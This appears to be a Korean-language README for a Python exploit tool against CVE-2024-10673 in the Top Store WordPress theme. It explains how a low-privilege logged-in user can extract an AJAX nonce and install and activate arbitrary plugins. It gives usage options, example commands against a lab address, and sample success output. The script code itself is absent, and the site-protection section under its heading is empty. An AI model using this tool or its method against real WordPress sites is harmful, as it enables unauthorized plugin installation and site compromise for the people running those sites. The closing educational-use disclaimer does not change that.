
Top Store <= 1.5.4 - 인증된 (구독자 이상) 임의의 플러그인 설치/활성화
이 스크립트는 Top Store WordPress 테마(<= 1.5.4) 에서 발견된 치명적인 취약점 CVE-2024-10673을 악용합니다. 이 결함으로 인해 구독자 수준 이상의 인증된 사용자가 보호되지 않은 AJAX 요청을 통해 임의의 플러그인을 설치 및 활성화할 수 있습니다.
nonce를 동적으로 추출하여 공격을 자동화합니다.themes.php?page=thunk_started에서 AJAX nonce를 추출합니다.hunk-companion 또는 사용자 정의 플러그인).usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
-pl PLUGIN, --plugin PLUGIN
Plugin slug to install and activate (default: hunk-companion)
hunk-companion) 설치 및 활성화:
python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
woocommerce) 설치 및 활성화:
python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}
WordPress 사이트를 보호하려면:
이 스크립트는 교육 및 보안 연구 목적으로만 제공됩니다. 소유하지 않거나 명시적인 테스트 허가를 받지 않은 시스템에 대한 무단 사용은 불법입니다. 책임 있게 사용하세요!
작성자: Khaled Alenazi (Nxploit)